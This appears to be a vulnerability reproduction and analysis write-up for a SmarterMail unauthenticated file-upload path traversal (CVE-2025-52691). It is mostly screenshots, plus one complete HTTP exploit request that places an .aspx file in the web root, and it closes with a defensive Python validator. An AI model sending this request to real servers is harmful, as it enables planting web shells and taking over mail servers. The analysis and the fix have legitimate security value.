## https://sploitus.com/exploit?id=C83C512F-6755-513A-80F4-8CAC48D10377
# CVE-2025-2025-52691-SmarterMail-Exp
# Environment Setup

```
SmarterMail 9400
https://downloads.smartertools.com/smartermail/100.0.9400/SmarterMail_9400.exe

Chrome
https://www.google.com/chrome/dev/

Winserver 2016
ed2k://|file|cn_windows_server_2016_x64_dvd_9718765.iso|6176450560|CF1B73D220F1160DE850D9E1979DBD50|/

DNSpyEx
https://github.com/dnSpyEx/dnSpy/releases

FindEverything
https://www.voidtools.com/zh-cn/support/everything/
```

The installation process is a default one; there’s nothing special to mention. During the installation, you’ll be asked to configure a domain name. I configured it as `yun.cn`.

Add the corresponding configuration to the `hosts` file.

![image-20260110024514605](F:\Books\Notes\TemporaryNotes\VulnerabilityAnalysis\SmarterMail.assets\image-20260110024514605.png)

![image-20260110024449410](F:\Books\Notes\TemporaryNotes\VulnerabilityAnalysis\SmarterMail.assets\image-20260110024449410.png)

![image-20260110024636264](F:\Books\Notes\TemporaryNotes\VulnerabilityAnalysis\SmarterMail.assets\image-20260110024636264.png)

# Vulnerability Reproduction

Access the server using the configured domain name; IP addresses won’t work.

![image-20260110025249395](F:\Books\Notes\TemporaryNotes\VulnerabilityAnalysis\SmarterMail.assets\image-20260110025249395.png)

```http
POST /api/upload HTTP/1.1
Host: yun.cn:9998
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:146.0) Gecko/20100101 Firefox/146.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Length: 6185

------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="context"

attachment
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="resumableIdentifier"

fakeID
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="resumableFilename"

fakefile.aspx
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="contextData"

{"guid":"dag/../../../../../../../inetpub/wwwroot/D7zC1a"}
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="whatever"; filename="fake.jpg"

[The file you uploaded]
------WebKitFormBoundary7MA4YWxkTrZu0gW--
```

![image-20260110025328273](F:\Books\Notes\TemporaryNotes\VulnerabilityAnalysis\SmarterMail.assets\image-20260110025328273-17679848084191.png)

# Vulnerability Analysis

Locate `MailService.dll` and drag it into `DNSpyEx`.

![image-20260110025729539](F:\Books\Notes\TemporaryNotes\VulnerabilityAnalysis\SmarterMail.assets\image-20260110025729539.png)

Find the `SmarterMail.Web.Api` namespace.

It contains a `FileUploadController` class whose route, `api/upload`, corresponds to the route used in the exploit request.

![image-20260110025944266](F:\books\notes\temporary_notes\vulnerability_analysis\SmarterMail.assets\image-20260110025944266.png)

![image-20260110030029776](F:\books\notes\temporary_notes\vulnerability_analysis\SmarterMail.assets\image-20260110030029776.png)

![image-20260110030320023](F:\books\notes\temporary_notes\vulnerability_analysis\SmarterMail.assets\image-20260110030320023.png)

Perform dynamic debugging.

![image-20260110030503936](F:\books\notes\temporary_notes\vulnerability_analysis\SmarterMail.assets\image-20260110030503936.png)

![image-20260110030519946](F:\books\notes\temporary_notes\vulnerability_analysis\SmarterMail.assets\image-20260110030519946-17679855200793.png)

Set breakpoints in the relevant code.

![image-20260110030547813](F:\books\notes\temporary_notes\vulnerability_analysis\SmarterMail.assets\image-20260110030547813.png)

When sending the payload again, you need to modify the value of `resumableFilename`; it just needs to be different from the previous one.

![image-20260110030657701](F:\books\notes\temporary_notes\vulnerability_analysis\SmarterMail.assets\image-20260110030657701.png)

Breakpoint set successfully.

![image-20260110030725195](F:\books\notes\temporary_notes\vulnerability_analysis\SmarterMail.assets\image-20260110030725195.png)

In the request packet, the `context` value is `attachment`; this should lead to this branch.

![image-20260110031110752](F:\books\notes\temporary_notes\vulnerability_analysis\SmarterMail.assets\image-20260110031110752.png)

![image-20260110031119402](F:\books\notes\temporary_notes\vulnerability_analysis\SmarterMail.assets\image-20260110031119402.png)

The next breakpoint jumps here.

![image-20260110031212197](F:\books\notes\temporary_notes\vulnerability_analysis\SmarterMail.assets\image-20260110031212197.png)

Check the file extension.

![image-20260110024514605](F:\books\notes\temporary_notes\vulnerability_analysis\SmarterMail.assets\image-20260110024514605.png)

The `configuration.FileName` actually corresponds to the value of `resumableFilename` in the request packet.

![image-20260110031533363](F:\books\notes\temporary_notes\vulnerability_analysis\SmarterMail.assets\image-20260110031533363.png)

![image-20260110031620847](F:\books\notes\temporary_notes\vulnerability_analysis\SmarterMail.assets\image-20260110031620847.png)

However, the list of banned extensions here is empty.

![image-20260110031928922](F:\books\notes\temporary_notes\vulnerability_analysis\SmarterMail.assets\image-20260110031928922.png)

A chunked (split) upload first creates a temporary file that stores the content of the uploaded chunks.

![image-20260110032318681](F:\books\notes\temporary_notes\vulnerability_analysis\SmarterMail.assets\image-20260110032318681.png)

![image-20260110032335113](F:\books\notes\temporary_notes\vulnerability_analysis\SmarterMail.assets\image-20260110032335113.png)

Then the `TryAssembleFile` function tries to merge the chunks from the split upload and deletes the temporary file.

![image-20260110032749749](F:\books\notes\temporary_notes\vulnerability_analysis\SmarterMail.assets\image-20260110032749749.png)

Finally, the directory traversal is completed in the `ProcessCompletedUploaded` function.

![image-20260110034718376](F:\books\notes\temporary_notes\vulnerability_analysis\SmarterMail.assets\image-20260110034718376.png)
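
The two gaps traced above are an unvalidated `guid` in `contextData` and an empty banned-extension list. The following added example (not SmarterMail's code and not part of the original write-up) shows the checks that would reject the request from the reproduction section. `ATTACHMENT_ROOT`, the extension list and both function names are assumptions made for illustration.

```python
import json
import ntpath  # Windows path semantics on any OS, since the target is Windows Server
import re

# Assumption: hypothetical attachment root; the real SmarterMail path is not shown on the page.
ATTACHMENT_ROOT = r"C:\SmarterMail\Attachments"
GUID_RE = re.compile(r"[0-9a-fA-F]{8}(-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}")


def resolve_under_root(root, *parts):
    """Join parts under root; return the normalized path, or None if it escapes root."""
    root = ntpath.normcase(ntpath.normpath(root))
    candidate = ntpath.normcase(ntpath.normpath(ntpath.join(root, *parts)))
    if candidate.startswith(root + "\\"):
        return candidate
    return None


def check_upload_fields(fields, banned_ext=(".aspx", ".ashx", ".asp", ".config")):
    """Return a list of findings for the form fields of one /api/upload request."""
    findings = []
    try:
        guid = json.loads(fields.get("contextData", "{}")).get("guid", "")
    except (ValueError, AttributeError):
        guid = ""
        findings.append("contextData is not a JSON object")
    if not isinstance(guid, str) or not GUID_RE.fullmatch(guid):
        findings.append("guid is not a well-formed GUID")
        guid = str(guid)
    # Only the base name of the client-supplied file name is ever joined to the path.
    name = fields.get("resumableFilename", "")
    if resolve_under_root(ATTACHMENT_ROOT, guid, ntpath.basename(name)) is None:
        findings.append("resolved path escapes the attachment root")
    if ntpath.splitext(name)[1].lower() in banned_ext:
        findings.append("server-executable file extension")
    return findings
```

The containment check runs on the fully normalized path, so it still holds if the GUID format check is later relaxed.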